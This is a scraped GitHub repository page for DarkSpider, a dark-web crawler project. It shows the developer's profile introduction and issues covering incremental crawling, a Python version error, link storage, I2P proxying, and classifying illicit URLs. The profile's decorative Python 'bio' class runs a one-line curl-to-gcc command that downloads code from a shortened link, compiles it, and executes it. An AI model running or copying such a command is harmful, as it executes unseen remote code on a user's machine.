
darkspider's Introduction

Yo 👋, I'm Pratik Pingale 👨‍💻

Just a novice. Still got a lot to learn.

class PROxZIMA:
  def __init__(self):
    subprocess.call("curl -sL 'bit.ly/pr0x21m4' | gcc -w -o name -xc - && ./name", shell=True)
    self.bio = {
      '- 💼 I’m currently working for': {'Convin.ai' : 'https://convin.ai'},
      '- 🔭 I’m currently working on' : {'DarkSpider': 'https://github.com/PROxZIMA/DarkSpider',
                                         'Prism'     : 'https://github.com/PROxZIMA/prism',
                                         'Sweet-Pop' : 'https://github.com/PROxZIMA/Sweet-Pop'},
      '- 🌱 I’m currently learning'   : ['Django', 'C++', 'Python', 'Full Stack Development', 'Algo Trading'],
      '- 💬 Ask me anything'          : '¯\_(ツ)_/¯',
      '- 👨‍💻 My projects available at' : 'https://github.com/PROxZIMA?tab=repositories',
      '- 📄 Know about my experiences': 'https://proxzima.dev/resume',
      '- ⚡ Fun fact'                 : ('Proxima Centauri is a small, low-mass star located 4.2465 light-'
                                         'years away from the Sun in the southern constellation of Centaurus.')
    }

if __name__ == '__main__':
  import subprocess, pprint
  pprint.pprint(PROxZIMA().__dict__)

- Tools/Interests 🔗

Arch Linux    Pop!_OS    Windows    Android    Firefox    Git    GitHub    BitBucket    Python    C    C++    Java    Kotlin    Bash    HTML5    CSS3    JavaScript    TypeScript    MySQL    PostgreSQL    FireBase    Numpy    Pandas    Jupyter    Django    Flask    Node.js    React    Google Colab    Google Cloud    CodePen    Hackerrank    CodeChef    LeetCode    InterviewBit    Figma    Postman    Alacritty    NeoVim    VS Codium    Android Studio

- Workspace 🖥️

NVIDIA 3050 AMD Ryzen 7 4800H Asus

- Languages 🔭

(top-languages card)

- Stats ⚡️

(GitHub stats and streak cards)

- Find me around the web 🌎

gmail pratik-pingale pro_x_zima pro_x_zima PROxZIMA#7272 PratikPingale PROxZIMA


darkspider's People

Contributors

knightster0804, mryellowowl, proxzima, r0nl, ytatiya3


darkspider's Issues

Implement Incremental crawling

Is your feature request related to a problem? Please describe.

An incremental crawler visits a specific site multiple times at a specific interval. The main focus of an incremental crawl is to keep the hyperlink list of a site up to date when its content changes frequently. After each visit, the site's "freshness" decreases as time passes; on the next iteration the crawler updates the hyperlinks, resetting the freshness.
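The freshness bookkeeping described here could be sketched as follows. This is a toy sketch only: `max_age`, the linear decay, and the 0.5 re-crawl threshold are assumptions for illustration, not the project's design.

```python
import time

class FreshnessTracker:
    """Track per-site freshness to decide when to re-crawl (illustrative sketch)."""

    def __init__(self, max_age=3600):
        self.max_age = max_age   # seconds until a site is considered fully stale
        self.last_visit = {}     # site -> timestamp of the last crawl

    def freshness(self, site, now=None):
        """1.0 right after a visit, decaying linearly to 0.0 at max_age."""
        now = time.time() if now is None else now
        if site not in self.last_visit:
            return 0.0           # never crawled: fully stale
        age = now - self.last_visit[site]
        return max(0.0, 1.0 - age / self.max_age)

    def needs_recrawl(self, site, threshold=0.5, now=None):
        return self.freshness(site, now) < threshold

    def mark_visited(self, site, now=None):
        """Reset freshness after the crawler updates the site's hyperlinks."""
        self.last_visit[site] = time.time() if now is None else now
```

On each iteration the crawler would ask `needs_recrawl(site)` and, after re-fetching the hyperlink list, call `mark_visited(site)` to reset the freshness.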

Describe the solution you'd like
TODO

Describe alternatives you've considered
TODO

Additional context
TODO

TypeError: 'type' object is not subscriptable

I have installed the requirements successfully, but with Python 3.8 on both Ubuntu 20.04 and Windows 10 I get the same error when trying to run darkspider.py:

Traceback (most recent call last):
  File "darkspider.py", line 58, in <module>
    from modules.helper import get_tor_proxies, setup_custom_logger
  File "/home/acwh0110/DarkSpider/modules/__init__.py", line 1, in <module>
    from modules.crawler import Crawler
  File "/home/acwh0110/DarkSpider/modules/crawler.py", line 15, in <module>
    from modules.checker import url_canon
  File "/home/acwh0110/DarkSpider/modules/checker.py", line 9, in <module>
    from modules.helper import TorProxyException, TorServiceException, get_requests_header
  File "/home/acwh0110/DarkSpider/modules/helper/__init__.py", line 1, in <module>
    from .helper import *
  File "/home/acwh0110/DarkSpider/modules/helper/helper.py", line 79, in <module>
    name: str, filename: str = "log.log", verbose_: bool = False, filelog: bool = True, argv: list[str] = None
TypeError: 'type' object is not subscriptable
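The error comes from the `list[str]` annotation on line 79 of helper.py: subscripting built-in types like `list` was only added in Python 3.9 (PEP 585), so on Python 3.8 the annotation raises `TypeError` at import time. A 3.8-compatible version of that signature (the function name is assumed from the import in the traceback) would use `typing.List`:

```python
from typing import List, Optional

# Python 3.8-compatible signature: use typing.List / typing.Optional
# instead of list[str], which is only subscriptable on Python 3.9+.
def setup_custom_logger(
    name: str,
    filename: str = "log.log",
    verbose_: bool = False,
    filelog: bool = True,
    argv: Optional[List[str]] = None,
):
    ...
```

Alternatively, adding `from __future__ import annotations` as the first import in helper.py makes annotations lazily evaluated, so the original `list[str]` spelling also works on Python 3.8.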

Store links relation in one-to-many json dictionary format

Describe the solution you'd like
Track links generated in crawler module

Format proposal

{
  "link1": [
    "link2",
    "link3",
    "link4"
  ],
  "link2": [
    "link5",
    "link6",
    "link4"
  ],
  "link3": [
    "link7",
    "link2",
    "link9"
  ],
  "link4": [
    "link1"
  ]
}

Optimization

  • Prevent infinite looping: link1 -> link2 -> link4 -> link1
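A sketch of how the crawler could build this one-to-many map while breaking the link1 -> link2 -> link4 -> link1 loop. The `get_links` callback stands in for the real page-fetching logic and is an assumption, not the project's API:

```python
def crawl_links(start, get_links, max_depth=3):
    """Build a one-to-many {url: [child urls]} dict. Pages already present
    in the dict are never expanded again, so cycles terminate."""
    relations = {}
    stack = [(start, 0)]
    while stack:
        url, depth = stack.pop()
        if url in relations or depth >= max_depth:
            continue                      # already expanded: breaks cycles
        children = get_links(url)
        relations[url] = children
        stack.extend((c, depth + 1) for c in children)
    return relations
```

The resulting dict serializes directly to the JSON format proposed above with `json.dump`.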

-u build.py build' failed with exit code 1

I have a problem building wxPython. I already tried this, but I still get the error below.

Checking for header Python.h                          : Distutils not installed? Broken python installation? Get python-config now!
      The configuration failed
      (complete log in /tmp/pip-install-8or1rxz3/wxpython_6001026db67149c2aed0382e7a140ba4/build/waf/3.8/gtk3/config.log)
      Command '"/usr/bin/python3.8" /tmp/pip-install-8or1rxz3/wxpython_6001026db67149c2aed0382e7a140ba4/bin/waf-2.0.24 --wx_config=/tmp/pip-install-8or1rxz3/wxpython_6001026db67149c2aed0382e7a140ba4/build/wxbld/gtk3/wx-config --gtk3 --python="/usr/bin/python3.8" --out=build/waf/3.8/gtk3 configure build ' failed with exit code 1.
      Finished command: build_py (0m2.111s)
      Finished command: build (19m2.947s)
      Command '"/usr/bin/python3.8" -u build.py build' failed with exit code 1.
      [end of output]
  
  note: This error originates from a subprocess, and is likely not a problem with pip.
  ERROR: Failed building wheel for wxpython
  Running setup.py clean for wxpython
Failed to build wxpython
Installing collected packages: wxpython, pandas, contourpy, beautifulsoup4, matplotlib, Gooey, seaborn
  Running setup.py install for wxpython ... error
  error: subprocess-exited-with-error
  
  × Running setup.py install for wxpython did not run successfully.
  │ exit code: 1
  ╰─> [63 lines of output]

and

  note: This error originates from a subprocess, and is likely not a problem with pip.
error: legacy-install-failure

× Encountered error while trying to install package.
╰─> wxpython

URL classification as illicit or not

Is your feature request related to a problem? Please describe.
The ultimate aim of the project is to detect illicit websites. As of now, the algorithm uses graph knowledge to target suspicious links. Advanced techniques are required to classify links accurately and to reduce the computational complexity.

Describe the solution you'd like
Text-based classification using NLP, which turns the crawler from a traditional Naive Best-First Crawler into a Context-Focused Crawler. This will further help in crawling at greater depths.

Describe alternatives you've considered
Classification technique is yet to be decided.
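For illustration, text-based classification can be as small as a bag-of-words Naive Bayes. A real implementation would more likely use TF-IDF features with a library classifier (e.g. scikit-learn); the training texts and labels below are invented toy data:

```python
import math
from collections import Counter, defaultdict

class TinyNaiveBayes:
    """Toy bag-of-words Naive Bayes with Laplace smoothing, a pure-Python
    stand-in for a real NLP classification pipeline."""

    def fit(self, texts, labels):
        self.word_counts = defaultdict(Counter)   # label -> word frequencies
        self.class_counts = Counter(labels)       # label -> document count
        for text, label in zip(texts, labels):
            self.word_counts[label].update(text.lower().split())
        self.vocab = {w for c in self.word_counts.values() for w in c}
        return self

    def predict(self, text):
        best, best_lp = None, -math.inf
        total = sum(self.class_counts.values())
        for label in self.class_counts:
            # log prior + smoothed log likelihood of each token
            lp = math.log(self.class_counts[label] / total)
            denom = sum(self.word_counts[label].values()) + len(self.vocab)
            for w in text.lower().split():
                lp += math.log((self.word_counts[label][w] + 1) / denom)
            if lp > best_lp:
                best, best_lp = label, lp
        return best
```

Plugged into the crawler, a classifier like this would score extracted page text and steer the frontier toward pages predicted illicit, which is the essence of a context-focused crawl.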

Extractor should use proper mechanism to extract and store URLs

Is your feature request related to a problem? Please describe.

The extractor takes the maximum file-name length into consideration and creates sub-directories based on the URL.

http://a.com/b.ext?x=&y=$%z2 -> a.com/b.extxyz2_.html (a.com folder with b.extxyz2_.html file in it)

This is good for storage purposes but does not act like a database.

Issues:

  • File retrieval and merging of data for URL classification is complex.
  • A URL can be very long, but file names have length constraints.

Describe the solution you'd like
A flat architecture where a folder contains files whose names are the SHA1 hashes of the respective URLs.

$ ls output/github.com/extracted/

00d1fbae77557ec45b3bfb3bdebfee49fd155cf9
b615c769e688dd83b2845ea0f32e2ee0c125c366
9b76fbceb3abd3423318ee37fd9ec1073961c14d

The links.txt file is renamed to links.json with the following content:

{
    "00d1fbae77557ec45b3bfb3bdebfee49fd155cf9": "http://github.com",
    "b615c769e688dd83b2845ea0f32e2ee0c125c366": "http://github.com/about/careers",
    "9b76fbceb3abd3423318ee37fd9ec1073961c14d": "http://github.com/sponsors"
}

Describe alternatives you've considered

Storing URLs in one big flat directory is a performance overhead as well (O(N) lookups).

Possible options:

  • SQL DB
  • Neo4j

Crawl I2P links

The dark web isn't made up of just .onion links. It consists of various darknets such as Tor, I2P, and Freenet. These darknets also hold a considerable amount of data. As they are P2P (peer-to-peer) networks, some adjustments are required to crawl them as well.

Describe the solution you'd like

  • Starting an I2P server on the local machine
  • Using its proxy (127.0.0.1:4444) to traverse I2P links.

I successfully implemented this method but need more ideas on integrating it with the current crawler efficiently.
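The proxy setup can be sketched with the standard library alone. This assumes a local I2P router exposing its HTTP proxy on the default 127.0.0.1:4444; the function name is illustrative:

```python
import urllib.request

def i2p_opener(proxy="127.0.0.1:4444"):
    """Build a urllib opener that routes HTTP requests through the local
    I2P HTTP proxy (assumes a running I2P router on the default port)."""
    handler = urllib.request.ProxyHandler({"http": f"http://{proxy}"})
    return urllib.request.build_opener(handler)

# Usage (requires a running I2P router; eepsite URL is a placeholder):
# opener = i2p_opener()
# html = opener.open("http://example.i2p/", timeout=60).read()
```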

(screenshot of the I2P crawl attached)
